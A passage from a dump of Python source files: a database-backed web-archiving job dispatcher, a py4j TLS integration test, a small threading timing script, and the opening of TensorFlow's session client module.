self.jobs_out = 0
self.jobs_in = 0
self.run_flag = multiprocessing.Value("b", 1, lock=False)
self.ratelimiter = common.NetlocThrottler.NetlockThrottler(key_prefix='raw', fifo_limit = 100 * 1000)
self.count_lock = threading.Lock()
self.limiter_lock = threading.Lock()
self.local = threading.local()
# This queue has to be a multiprocessing queue, because it's shared across multiple processes.
self.normal_out_queue = multiprocessing.Queue(maxsize=MAX_IN_FLIGHT_JOBS * 2)
self.fetch_procs = [
threading.Thread(target=self.filler_run_shim, args=('priority', )),
threading.Thread(target=self.filler_run_shim, args=('new_fetch', )),
threading.Thread(target=self.filler_run_shim, args=('random', )),
threading.Thread(target=self.drainer_run_shim),
]
for proc in self.fetch_procs:
proc.start()
self.print_mod = 0
def filler_run_shim(self, mode):
try:
self.queue_filler_proc(mode)
except KeyboardInterrupt:
print("Saw keyboard interrupt. Breaking!")
return
except Exception:
print("Error!")
print("Error!")
print("Error!")
print("Error!")
traceback.print_exc()
with open("error %s - %s.txt" % ("rawjobdispatcher", time.time()), "w") as fp:
fp.write("Manager crashed?\n")
fp.write(traceback.format_exc())
raise
def drainer_run_shim(self):
self.local.db_interface = psycopg2.connect(
database = settings.DATABASE_DB_NAME,
user = settings.DATABASE_USER,
password = settings.DATABASE_PASS,
host = settings.DATABASE_IP,
)
try:
self.queue_drainer_proc()
except KeyboardInterrupt:
print("Saw keyboard interrupt. Breaking!")
return
except Exception:
print("Error!")
print("Error!")
print("Error!")
print("Error!")
traceback.print_exc()
with open("error %s - %s.txt" % ("rawjobdispatcher", time.time()), "w") as fp:
fp.write("Manager crashed?\n")
fp.write(traceback.format_exc())
raise
def outbound_job_wanted(self, netloc, joburl):
bad = common.util.urlFuncs.hasDuplicateSegments(joburl)
if bad:
self.log.warn("Unwanted URL (pathchunks): '%s' - %s", joburl, bad)
return False
if joburl.startswith("data:"):
self.log.warn("Data URL: '%s' - %s", joburl, netloc)
return False
if joburl.startswith("mailto:"):
self.log.warn("Email URL: '%s' - %s", joburl, netloc)
return False
if not joburl.startswith("http"):
self.log.warn("Non HTTP URL: '%s' - %s", joburl, netloc)
return False
for module in RawArchiver.RawActiveModules.ACTIVE_MODULES:
if module.cares_about_url(joburl):
return True
self.log.warn("Unwanted URL: '%s' - %s", joburl, netloc)
return False
def outbound_job_disabled(self, netloc, joburl):
for module in RawArchiver.RawActiveModules.ACTIVE_MODULES:
if module.cares_about_url(joburl):
if module.is_disabled(netloc, joburl):
self.log.warn("Disabled fetching for URL: '%s' - %s", joburl, netloc)
return True
return False
def get_queue(self):
return self.normal_out_queue
def join_proc(self):
self.run_flag.value = 0
for _ in range(60 * 5):
for proc in self.fetch_procs:
proc.join(timeout=1)
if any([tmp.is_alive() for tmp in self.fetch_procs]) is False:
return
self.log.info("Waiting for job dispatcher to join. Currently active jobs in queue: %s, states: %s",
self.normal_out_queue.qsize(),
[tmp.is_alive() for tmp in self.fetch_procs]
)
while True:
for proc in self.fetch_procs:
proc.join(timeout=1)
if any([tmp.is_alive() for tmp in self.fetch_procs]) is False:
return
self.log.error("Timeout when waiting for join. Bulk consuming from intermediate queue. States: %s",
[tmp.is_alive() for tmp in self.fetch_procs],
)
try:
while 1:
self.normal_out_queue.get_nowait()
except queue.Empty:
pass
def put_outbound_job(self, jobid, joburl, netloc=None):
self.log.info("Dispatching new job (active jobs: %s of %s)", self.active_jobs, MAX_IN_FLIGHT_JOBS)
raw_job = WebMirror.JobUtils.buildjob(
module = 'SmartWebRequest',
call = 'smartGetItem',
dispatchKey = "fetcher",
jobid = jobid,
args = [joburl],
kwargs = {},
additionalData = {'mode' : 'fetch', 'netloc' : netloc},
postDelay = 0
)
        # Recycle the RPC interface if it has died.
while 1:
try:
self.local.rpc_interface.put_job(raw_job)
with self.count_lock:
self.active_jobs += 1
self.jobs_out += 1
with self.mon_con.pipeline() as pipe:
pipe.gauge('active_jobs', self.active_jobs)
pipe.gauge('jobs_out', self.jobs_out)
pipe.gauge('jobs_in', self.jobs_in)
pipe.gauge('qsize', self.normal_out_queue.qsize())
return
except TypeError:
self.open_rpc_interface()
except KeyError:
self.open_rpc_interface()
except socket.timeout:
self.open_rpc_interface()
except ConnectionRefusedError:
self.open_rpc_interface()
def fill_jobs(self, mode):
if 'drain' in sys.argv:
return
escape_count = 0
while self.active_jobs < MAX_IN_FLIGHT_JOBS and escape_count < 25 and self.normal_out_queue.qsize() < LOCAL_ENQUEUED_JOB_RESPONSES:
old = self.normal_out_queue.qsize()
num_new = self._get_task_internal(mode)
self.log.info("Need to add jobs to the job queue (%s active, %s added)!", self.active_jobs, self.active_jobs-old)
if self.run_flag.value != 1:
return
with self.limiter_lock:
new_j_l =self.ratelimiter.get_available_jobs()
for rid, joburl, netloc in new_j_l:
self.put_outbound_job(rid, joburl, netloc)
# If there weren't any new items, stop looping because we're not going anywhere.
if num_new == 0:
break
escape_count += 1
def open_rpc_interface(self):
try:
self.local.rpc_interface.close()
except Exception: # pylint: disable=W0703
pass
for _ in range(100):
try:
self.local.rpc_interface = common.get_rpyc.RemoteJobInterface("RawMirror")
return
except TypeError:
pass
except KeyError:
pass
except socket.timeout:
pass
except ConnectionRefusedError:
pass
raise RuntimeError("Could not establish connection to RPC remote!")
def process_responses(self):
while 1:
            # Something in the RPC layer occasionally raises a TypeError whose source isn't
            # clear. If that happens, just reset the RPC interface and try again.
try:
tmp = self.local.rpc_interface.get_job()
with self.count_lock:
self.active_jobs -= 1
self.jobs_in += 1
if self.active_jobs < 0:
self.active_jobs = 0
except queue.Empty:
return
except TypeError:
self.open_rpc_interface()
return
except KeyError:
self.open_rpc_interface()
return
except socket.timeout:
self.open_rpc_interface()
return
except ConnectionRefusedError:
self.open_rpc_interface()
return
except OSError:
self.open_rpc_interface()
return
if tmp:
nl = None
if 'extradat' in tmp and 'netloc' in tmp['extradat']:
nl = tmp['extradat']['netloc']
if nl:
with self.limiter_lock:
if 'success' in tmp and tmp['success']:
self.ratelimiter.netloc_ok(nl)
else:
print("Success val: ", 'success' in tmp, list(tmp.keys()))
self.ratelimiter.netloc_error(nl)
else:
self.log.warning("Missing netloc in response extradat!")
self.log.info("Job response received. Jobs in-flight: %s (qsize: %s)", self.active_jobs, self.normal_out_queue.qsize())
self.last_rx = datetime.datetime.now()
self.blocking_put_response(("processed", tmp))
else:
self.print_mod += 1
if self.print_mod > 20:
self.log.info("No job responses available.")
self.print_mod = 0
time.sleep(1)
break
def blocking_put_response(self, item):
while self.run_flag.value == 1:
try:
self.normal_out_queue.put_nowait(item)
return
except queue.Full:
self.log.warning("Response queue full (%s items). Sleeping", self.normal_out_queue.qsize())
time.sleep(1)
def queue_filler_proc(self, mode):
common.process.name_process("raw job filler worker")
self.open_rpc_interface()
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except ValueError:
self.log.warning("Cannot configure job fetcher task to ignore SIGINT. May be an issue.")
self.log.info("Job queue fetcher starting.")
msg_loop = 0
retries = 0
while self.run_flag.value == 1:
try:
self.local.db_interface = psycopg2.connect(
database = settings.DATABASE_DB_NAME,
user = settings.DATABASE_USER,
password = settings.DATABASE_PASS,
host = settings.DATABASE_IP,
)
while self.run_flag.value == 1:
self.fill_jobs(mode)
msg_loop += 1
time.sleep(0.2)
if msg_loop > 25:
self.log.info("Job queue filler process (%s). In-Flight: %s, waiting: %s (out: %s, in: %s). Runstate: %s",
mode,
self.active_jobs,
self.normal_out_queue.qsize(),
self.jobs_out,
self.jobs_in,
self.run_flag.value==1)
retries = 0
msg_loop = 0
except psycopg2.Error:
self.log.error("Exception in psycopg2 in filler process!")
for line in traceback.format_exc().split("\n"):
self.log.error(line)
retries += 1
if retries > 5:
raise
self.log.info("Job queue fetcher saw exit flag. Halting.")
self.local.rpc_interface.close()
# Consume the remaining items in the output queue so it shuts down cleanly.
try:
while 1:
self.normal_out_queue.get_nowait()
except queue.Empty:
pass
self.log.info("Job queue filler process. Current job queue size: %s. ", self.active_jobs)
self.log.info("Job queue fetcher halted.")
def queue_drainer_proc(self):
common.process.name_process("raw job filler worker")
self.open_rpc_interface()
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except ValueError:
self.log.warning("Cannot configure job fetcher task to ignore SIGINT. May be an issue.")
self.log.info("Job queue fetcher starting.")
msg_loop = 0
while self.run_flag.value == 1:
self.process_responses()
msg_loop += 1
time.sleep(0.2)
if msg_loop > 25:
self.log.info("Job queue filler process. Current job queue size: %s (out: %s, in: %s). Runstate: %s", self.active_jobs, self.jobs_out, self.jobs_in, self.run_flag.value==1)
msg_loop = 0
with self.limiter_lock:
self.ratelimiter.job_reduce()
self.log.info("Job queue fetcher saw exit flag. Halting.")
self.local.rpc_interface.close()
# Consume the remaining items in the output queue so it shuts down cleanly.
try:
while 1:
self.normal_out_queue.get_nowait()
except queue.Empty:
pass
self.log.info("Job queue filler process. Current job queue size: %s. ", self.active_jobs)
self.log.info("Job queue fetcher halted.")
def _get_task_internal(self, mode):
cursor = self.local.db_interface.cursor()
# Hand-tuned query, I couldn't figure out how to
# get sqlalchemy to emit /exactly/ what I wanted.
# TINY changes will break the query optimizer, and
# the 10 ms query will suddenly take 10 seconds!
if mode == 'priority':
raw_query = '''
UPDATE
raw_web_pages
SET
state = 'fetching'
WHERE
raw_web_pages.id IN (
SELECT
raw_web_pages.id
FROM
raw_web_pages
WHERE
raw_web_pages.state = 'new'
AND
raw_web_pages.priority <= (
SELECT
min(priority)
FROM
raw_web_pages
WHERE
state = 'new'::dlstate_enum
AND
raw_web_pages.ignoreuntiltime < now() + '5 minutes'::interval
) + 1
AND
raw_web_pages.ignoreuntiltime < now() + '5 minutes'::interval
LIMIT {in_flight}
)
AND
raw_web_pages.state = 'new'
RETURNING
raw_web_pages.id, raw_web_pages.netloc, raw_web_pages.url;
'''.format(in_flight=min((MAX_IN_FLIGHT_JOBS, 150)))
elif mode == 'new_fetch':
raw_query = '''
UPDATE
raw_web_pages
SET
state = 'fetching'
WHERE
raw_web_pages.id IN (
SELECT
raw_web_pages.id
FROM
raw_web_pages
WHERE
raw_web_pages.state = 'new'
AND
raw_web_pages.fspath IS NULL
AND
raw_web_pages.ignoreuntiltime < now() + '5 minutes'::interval
LIMIT {in_flight}
)
AND
raw_web_pages.state = 'new'
RETURNING
raw_web_pages.id, raw_web_pages.netloc, raw_web_pages.url;
'''.format(in_flight=min((MAX_IN_FLIGHT_JOBS, 150)))
elif mode == 'random':
raw_query = '''
UPDATE
raw_web_pages
SET
state = 'fetching'
WHERE
raw_web_pages.id IN (
SELECT
raw_web_pages.id
FROM
raw_web_pages
WHERE
raw_web_pages.state = 'new'
AND
raw_web_pages.ignoreuntiltime < now() + '5 minutes'::interval
LIMIT {in_flight}
)
AND
raw_web_pages.state = 'new'
RETURNING
raw_web_pages.id, raw_web_pages.netloc, raw_web_pages.url;
'''.format(in_flight=min((MAX_IN_FLIGHT_JOBS, 150)))
else:
self.log.error("Unknown dispatch mode: '%s'" % mode)
return
start = time.time()
while self.run_flag.value == 1:
try:
cursor.execute("""SET statement_timeout TO 900000;""")
cursor.execute(raw_query)
rids = cursor.fetchall()
self.local.db_interface.commit()
break
except psycopg2.Error:
delay = random.random() / 3
# traceback.print_exc()
self.log.warn("Error getting job (psycopg2.Error)! Delaying %s.", delay)
time.sleep(delay)
self.local.db_interface.rollback()
if self.run_flag.value != 1:
return 0
rids = list(rids)
        # If we broke out of the loop because of a user interrupt, rids may not be
        # valid at this point.
if self.run_flag.value != 1:
return 0
xqtim = time.time() - start
if not rids:
self.log.warning("No jobs available! Sleeping for 5 seconds waiting for new jobs to become available!")
for dummy_x in range(5):
if self.run_flag.value == 1:
time.sleep(1)
return 0
if xqtim > 0.5:
self.log.error("Query execution time: %s ms. Fetched job IDs = %s", xqtim * 1000, len(rids))
elif xqtim > 0.1:
self.log.warn("Query execution time: %s ms. Fetched job IDs = %s", xqtim * 1000, len(rids))
else:
self.log.info("Query execution time: %s ms. Fetched job IDs = %s", xqtim * 1000, len(rids))
dispatched = 0
for rid, netloc, joburl in rids:
try:
# If we don't have a thread affinity, do distributed fetch.
# If we /do/ have a thread affinity, fetch locally.
if not self.outbound_job_wanted(netloc, joburl):
self.delete_job(rid, joburl)
continue
if self.outbound_job_disabled(netloc, joburl):
self.disable_job(rid, joburl)
continue
dispatched += 1
threadn = RawArchiver.misc.thread_affinity(joburl, 1)
if threadn is True:
with self.limiter_lock:
self.ratelimiter.put_job(rid, joburl, netloc)
# self.put_outbound_job(rid, joburl, netloc=netloc)
else:
self.blocking_put_response(("unfetched", rid))
except RawArchiver.misc.UnwantedUrlError:
self.log.warning("Unwanted url in database? Url: '%s'", joburl)
self.log.warning("Deleting entry.")
cursor.execute("""DELETE FROM raw_web_pages WHERE url = %s AND id = %s;""", (joburl, rid))
self.local.db_interface.commit()
cursor.execute("""RESET statement_timeout;""")
cursor.close()
return dispatched
def delete_job(self, rid, joburl):
self.log.warning("Deleting job for url: '%s'", joburl)
cursor = self.local.db_interface.cursor()
cursor.execute("""DELETE FROM raw_web_pages WHERE raw_web_pages.id = %s AND raw_web_pages.url = %s;""", (rid, joburl))
self.local.db_interface.commit()
def disable_job(self, rid, joburl):
self.log.warning("Disabling job for url: '%s'", joburl)
cursor = self.local.db_interface.cursor()
cursor.execute("""UPDATE raw_web_pages SET state = %s WHERE raw_web_pages.id = %s AND raw_web_pages.url = %s;""", ('disabled', rid, joburl))
self.local.db_interface.commit()
def get_status(self):
if any([tmp.is_alive() for tmp in self.fetch_procs]):
return "Worker: %s, alive: %s, control: %s, last_rx: %s, active_jobs: %s, jobs_out: %s, jobs_in: %s." % (
[tmp.ident for tmp in self.fetch_procs],
[tmp.is_alive() for tmp in self.fetch_procs],
self.run_flag.value,
self.last_rx,
self.active_jobs,
self.jobs_out,
self.jobs_in,
)
return "Worker is none! Error!"
def test2():
import logSetup
import pprint
logSetup.initLogging()
agg = RawJobAggregator()
outq = agg.get_queues()
for x in range(20):
print("Sleeping, ", x)
time.sleep(1)
try:
j = outq.get_nowait()
print("Received job! %s", len(j))
with open("jobs.txt", "a") as fp:
fp.write("\n\n\n")
fp.write(pprint.pformat(j))
print(j)
except queue.Empty:
pass
print("Joining on the aggregator")
agg.join_proc()
print("Joined.")
if __name__ == "__main__":
test2()
|
java_tls_test.py
|
"""
Created on Feb 2, 2016
@author: Nick White
"""
from __future__ import unicode_literals, absolute_import
from multiprocessing import Process
import subprocess
import unittest
import ssl
import os
import sys
from py4j.java_gateway import (
JavaGateway, CallbackServerParameters,
set_default_callback_accept_timeout, GatewayParameters)
from py4j.tests.java_gateway_test import (
PY4J_JAVA_PATH, safe_shutdown, sleep)
set_default_callback_accept_timeout(0.125)
def start_example_tls_server():
subprocess.call([
"java", "-cp", PY4J_JAVA_PATH,
"py4j.examples.ExampleSSLApplication"])
def start_example_tls_process():
p = Process(target=start_example_tls_server)
p.start()
sleep()
return p
class Adder(object):
def doOperation(self, i, j):
return i + j
class Java:
implements = ["py4j.examples.Operator"]
if sys.version_info >= (2, 7):
# ssl.SSLContext introduced in Python 2.7
class TestIntegration(unittest.TestCase):
"""Tests cases borrowed from other files, but executed over a
TLS connection.
"""
def setUp(self):
key_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"selfsigned.pem")
client_ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_ssl_context.verify_mode = ssl.CERT_REQUIRED
client_ssl_context.check_hostname = True
client_ssl_context.load_verify_locations(cafile=key_file)
server_ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_ssl_context.load_cert_chain(key_file, password='password')
callback_server_parameters = CallbackServerParameters(
ssl_context=server_ssl_context)
# address must match cert, because we're checking hostnames
gateway_parameters = GatewayParameters(
address='localhost',
ssl_context=client_ssl_context)
self.p = start_example_tls_process()
self.gateway = JavaGateway(
gateway_parameters=gateway_parameters,
callback_server_parameters=callback_server_parameters)
sleep()
def tearDown(self):
safe_shutdown(self)
self.p.join()
sleep()
def testUnicode(self):
sb = self.gateway.jvm.java.lang.StringBuffer()
sb.append("\r\n\tHello\r\n\t")
self.assertEqual("\r\n\tHello\r\n\t", sb.toString())
def testMethodConstructor(self):
sleep()
adder = Adder()
oe1 = self.gateway.jvm.py4j.examples.OperatorExample()
# Test method
oe1.randomBinaryOperator(adder)
# Test constructor
oe2 = self.gateway.jvm.py4j.examples.OperatorExample(adder)
self.assertTrue(oe2 is not None)
if __name__ == "__main__":
unittest.main()
|
test.py
|
import time
import threading
#_lock = threading.Lock()
def _io_bound():
while True:
time.sleep(1)
print("io: ", threading.current_thread().ident)
# _lock.acquire()
# for i in range(10000000):
# pass
# _lock.release()
def _cpu_bound():
    k = 0
    while k < 50:
        for i in range(1000000):
            pass
        k += 1
import os
import sys
print(sys.executable, " ", os.getpid())
t0 = time.time()
# import gil_load
# gil_load.init()
# gil_load.start(output=sys.stdout)
for i in range(1):
t = threading.Thread(target=_io_bound)
t.daemon = True
t.start()
wait_threads = []
for i in range(3):
t = threading.Thread(target=_cpu_bound)
t.daemon = True
t.start()
wait_threads.append(t)
print("all threads created!")
# try:
for t in wait_threads:
t.join()
# except:
# sys.exit(0)
print("Elapsed=%0.6f" % (time.time() - t0))
|
session.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A client interface for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import re
import threading
import warnings
import numpy as np
import wrapt
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import pywrap_tf_session as tf_session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import device
from tensorflow.python.framework import error_interpolation
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import session_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training.experimental import mixed_precision_global_state
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.tf_export import tf_export
_python_session_create_counter = monitoring.Counter(
'/tensorflow/api/python/session_create_counter',
'Counter for number of sessions created in Python.')
class SessionInterface(object):
"""Base class for implementations of TensorFlow client sessions."""
@property
def graph(self):
"""The underlying TensorFlow graph, to be used in building Operations."""
raise NotImplementedError('graph')
@property
def sess_str(self):
"""The TensorFlow process to which this session will connect."""
raise NotImplementedError('sess_str')
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations in the session. See `BaseSession.run()` for details."""
raise NotImplementedError('run')
def partial_run_setup(self, fetches, feeds=None):
"""Sets up the feeds and fetches for partial runs in the session."""
raise NotImplementedError('partial_run_setup')
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with additional feeds and fetches."""
raise NotImplementedError('partial_run')
def _get_indexed_slices_value_from_fetches(fetched_vals):
return ops.IndexedSlicesValue(
fetched_vals[0], fetched_vals[1],
fetched_vals[2] if len(fetched_vals) == 3 else None)
def _get_feeds_for_indexed_slices(feed, feed_val):
return list(
zip([feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape], feed_val))
# List of extensions supported to convert run arguments into actual fetches and
# feeds.
#
# Each element in the list is a tuple of (Type, fetch_fn, feed_fn1, feed_fn2),
# where the function signatures are:
# fetch_fn : Type -> (list of Tensors,
# lambda: list of fetched np.ndarray -> TypeVal)
# feed_fn1 : Type, TypeVal -> list of (Tensor, value)
# feed_fn2 : Type -> list of Tensors
#
# `fetch_fn` describes how to expand fetch into its
# component Tensors and how to contract the fetched results back into
# a single return value.
#
# Each feed function describes how to unpack a single fed value and map it to
# feeds of one or more tensors and their corresponding values: `feed_fn1` is
# used to feed a run, `feed_fn2` to set up a partial run.
#
# TODO(touts): We could reimplement these as specialized _FeedMapper
# implementations after we refactor the feed handling code to use them.
#
# Eventually, this registration could be opened up to support custom Tensor
# expansions.
# pylint: disable=g-long-lambda
_REGISTERED_EXPANSIONS = [
# SparseTensors are fetched as SparseTensorValues. They can be fed
# SparseTensorValues or normal tuples.
(sparse_tensor.SparseTensor, lambda fetch: ([
fetch.indices, fetch.values, fetch.dense_shape
], lambda fetched_vals: sparse_tensor.SparseTensorValue(*fetched_vals)),
lambda feed, feed_val: list(
zip([feed.indices, feed.values, feed.dense_shape], feed_val)),
lambda feed: [feed.indices, feed.values, feed.dense_shape]),
# IndexedSlices are fetched as IndexedSlicesValues. They can be fed
# IndexedSlicesValues or normal tuples.
(ops.IndexedSlices,
lambda fetch: ([fetch.values, fetch.indices] if fetch.dense_shape is None
else [fetch.values, fetch.indices, fetch.dense_shape
], _get_indexed_slices_value_from_fetches),
_get_feeds_for_indexed_slices,
lambda feed: [feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape]),
# The default catches all other types and performs no expansions.
(object, lambda fetch: ([fetch], lambda fetched_vals: fetched_vals[0]),
lambda feed, feed_val: [(feed, feed_val)], lambda feed: [feed])
]
# pylint: enable=g-long-lambda
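# A tiny, standalone illustration (never called by the code below) of the
# (fetch_fn, contraction_fn) contract documented above, using the catch-all
# `object` entry: the fetch is expanded into a one-element list, and the paired
# contraction callable pulls the single fetched value back out.
def _default_expansion_example():
  default_fetch_fn = _REGISTERED_EXPANSIONS[-1][1]
  tensors, contraction_fn = default_fetch_fn('some_tensor_name')
  assert tensors == ['some_tensor_name']
  assert contraction_fn([7]) == 7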
def _convert_to_numpy_obj(numpy_dtype, obj):
"""Explicitly convert obj based on numpy type except for string type."""
return numpy_dtype(obj) if numpy_dtype is not object else str(obj)
def register_session_run_conversion_functions(
tensor_type,
fetch_function,
feed_function=None,
feed_function_for_partial_run=None):
"""Register fetch and feed conversion functions for `tf.Session.run()`.
This function registers a triple of conversion functions for fetching and/or
feeding values of user-defined types in a call to tf.Session.run().
An example
```python
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = tf.square(tensor)
#you can define conversion functions as follows:
fetch_function = lambda squared_tensor:([squared_tensor.sq],
lambda val: val[0])
feed_function = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_function_for_partial_run = lambda feed: [feed.sq]
#then after invoking this register function, you can use as follows:
session.run(squared_tensor1,
feed_dict = {squared_tensor2 : some_numpy_array})
```
Args:
tensor_type: The type for which you want to register a conversion function.
fetch_function: A callable that takes an object of type `tensor_type` and
returns a tuple, where the first element is a list of `tf.Tensor` objects,
and the second element is a callable that takes a list of ndarrays and
returns an object of some value type that corresponds to `tensor_type`.
fetch_function describes how to expand fetch into its component Tensors
and how to contract the fetched results back into a single return value.
feed_function: A callable that takes feed_key and feed_value as input, and
returns a list of tuples (feed_tensor, feed_val), feed_key must have type
`tensor_type`, and feed_tensor must have type `tf.Tensor`. Each feed
function describes how to unpack a single fed value and map it to feeds of
one or more tensors and their corresponding values.
feed_function_for_partial_run: A callable for specifying tensor values to
feed when setting up a partial run, which takes a `tensor_type` type
object as input, and returns a list of Tensors.
Raises:
ValueError: If `tensor_type` has already been registered.
"""
for conversion_function in _REGISTERED_EXPANSIONS:
if issubclass(conversion_function[0], tensor_type):
      raise ValueError('%s has already been registered.' % tensor_type)
_REGISTERED_EXPANSIONS.insert(0, (tensor_type, fetch_function, feed_function,
feed_function_for_partial_run))
def _is_attrs_instance(obj):
"""Returns True if the given obj is an instance of attrs-decorated class."""
return getattr(obj.__class__, '__attrs_attrs__', None) is not None
def _get_attrs_values(obj):
"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, '__attrs_attrs__')
return [getattr(obj, a.name) for a in attrs]
class _FetchMapper(object):
"""Definition of the interface provided by fetch mappers.
Fetch mappers are utility classes used by the _FetchHandler to handle
arbitrary structures for the `fetch` argument to `Session.run()`.
The `fetch` argument can be of various shapes: single tensor or op, list of
fetches, tuple of fetches, namedtuple of fetches, or dict of fetches. The
structures can be arbitrarily nested.
The low level run() API only wants a list of tensor or op names. The various
`_FetchMapper` subclasses below take care of handling the different shapes:
uniquifying the fetches, and constructing results with the original shape.
"""
def unique_fetches(self):
"""Return the list of unique tensors or ops needed by this fetch mapper.
Returns:
A list of tensors or ops.
"""
raise NotImplementedError('Must be implemented by subclasses')
def build_results(self, values):
"""Build results that match the original shape of the fetch.
Args:
values: List of values returned by run(). The values correspond exactly to
the list tensors or ops returned by unique_fetches().
Returns:
A struct of the same shape as the original fetch object handled by
this fetch mapper. In the returned struct, the original fetches are
replaced by their fetched values.
"""
raise NotImplementedError('Must be implemented by subclasses')
@staticmethod
def for_fetch(fetch):
"""Creates fetch mapper that handles the structure of `fetch`.
The default graph must be the one from which we want to fetch values when
this function is called.
Args:
fetch: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
Returns:
An instance of a subclass of `_FetchMapper` that handles the shape.
"""
if fetch is None:
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
elif isinstance(fetch, (list, tuple)):
# NOTE(touts): This is also the code path for namedtuples.
return _ListFetchMapper(fetch)
elif isinstance(fetch, collections_abc.Mapping):
return _DictFetchMapper(fetch)
elif _is_attrs_instance(fetch):
return _AttrsFetchMapper(fetch)
else:
# Look for a handler in the registered expansions.
for tensor_type, fetch_fn, _, _ in _REGISTERED_EXPANSIONS:
if isinstance(fetch, tensor_type):
fetches, contraction_fn = fetch_fn(fetch)
return _ElementFetchMapper(fetches, contraction_fn)
# Did not find anything.
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
class _ElementFetchMapper(_FetchMapper):
"""Fetch mapper for singleton tensors and ops."""
def __init__(self, fetches, contraction_fn):
"""Creates an _ElementFetchMapper.
This is the fetch mapper used for leaves in the fetch struct. Because of
the expansions mechanism, a leaf can actually fetch more than one tensor.
Also note that the fetches here can be just strings (tensor or op names) or
any other object that the graph knows how to convert to a tensor, such as a
Variable. So we have to run each fetch through `as_graph_element()` to get
the corresponding tensor or op.
Args:
fetches: List of objects, as returned by a fetch_fn defined in
_REGISTERED_EXPANSIONS.
contraction_fn: Callable as returned by a fetch_fn.
"""
self._unique_fetches = []
for fetch in fetches:
try:
self._unique_fetches.append(ops.get_default_graph().as_graph_element(
fetch, allow_tensor=True, allow_operation=True))
except TypeError as e:
raise TypeError('Fetch argument %r has invalid type %r, '
'must be a string or Tensor. (%s)' %
(fetch, type(fetch), str(e)))
except ValueError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
except KeyError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
self._contraction_fn = contraction_fn
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
if not values:
# 'Operation' case
return None
else:
return self._contraction_fn(values)
def _uniquify_fetches(fetch_mappers):
"""Uniquifies fetches from a list of fetch_mappers.
This is a utility function used by _ListFetchMapper and _DictFetchMapper. It
gathers all the unique fetches from a list of mappers and builds a list
containing all of them but without duplicates (unique_fetches).
It also returns a 2-D list of integers (values_indices) indicating at which
index in unique_fetches the fetches of the mappers are located.
This list is as follows:
values_indices[mapper_index][mapper_fetch_index] = unique_fetches_index
Args:
fetch_mappers: list of fetch mappers.
Returns:
A list of fetches.
A 2-D list of integers.
"""
unique_fetches = []
value_indices = []
seen_fetches = {}
for m in fetch_mappers:
m_value_indices = []
for f in m.unique_fetches():
j = seen_fetches.get(id(f))
if j is None:
j = len(seen_fetches)
seen_fetches[id(f)] = j
unique_fetches.append(f)
m_value_indices.append(j)
value_indices.append(m_value_indices)
return unique_fetches, value_indices
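# A small, self-contained illustration (not used elsewhere in this module) of the
# indexing scheme described in the docstring above: duplicate fetches are stored
# once in unique_fetches, and value_indices records, per mapper, where each of
# its fetches landed in that deduplicated list. The stub mapper below exists only
# for this example.
def _uniquify_fetches_example():
  class _StubMapper(object):
    def __init__(self, fetches):
      self._fetches = fetches
    def unique_fetches(self):
      return self._fetches
  a, b, c = object(), object(), object()
  unique, indices = _uniquify_fetches([_StubMapper([a, b]), _StubMapper([b, c])])
  assert unique == [a, b, c]
  assert indices == [[0, 1], [1, 2]]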
class _ListFetchMapper(_FetchMapper):
"""Fetch mapper for lists, tuples, and namedtuples."""
def __init__(self, fetches):
"""Creates a _ListFetchMapper.
Args:
fetches: List, tuple, or namedtuple of fetches.
"""
if isinstance(fetches, wrapt.ObjectProxy):
self._fetch_type = type(fetches.__wrapped__)
else:
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in fetches]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
# Create the list of results for each mapper.
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
# Return a value of the original type of the fetches.
if issubclass(self._fetch_type, list):
return results
elif self._fetch_type == tuple:
return tuple(results)
else:
# This is the code path for namedtuple.
return self._fetch_type(*results)
class _DictFetchMapper(_FetchMapper):
"""Fetch mapper for dicts."""
def __init__(self, fetches):
"""Creates a _DictFetchMapper.
Args:
fetches: Dict of fetches.
"""
self._fetch_type = type(fetches)
if isinstance(fetches, collections.defaultdict):
self._type_ctor = functools.partial(collections.defaultdict,
fetches.default_factory)
else:
self._type_ctor = self._fetch_type
self._keys = fetches.keys()
self._mappers = [
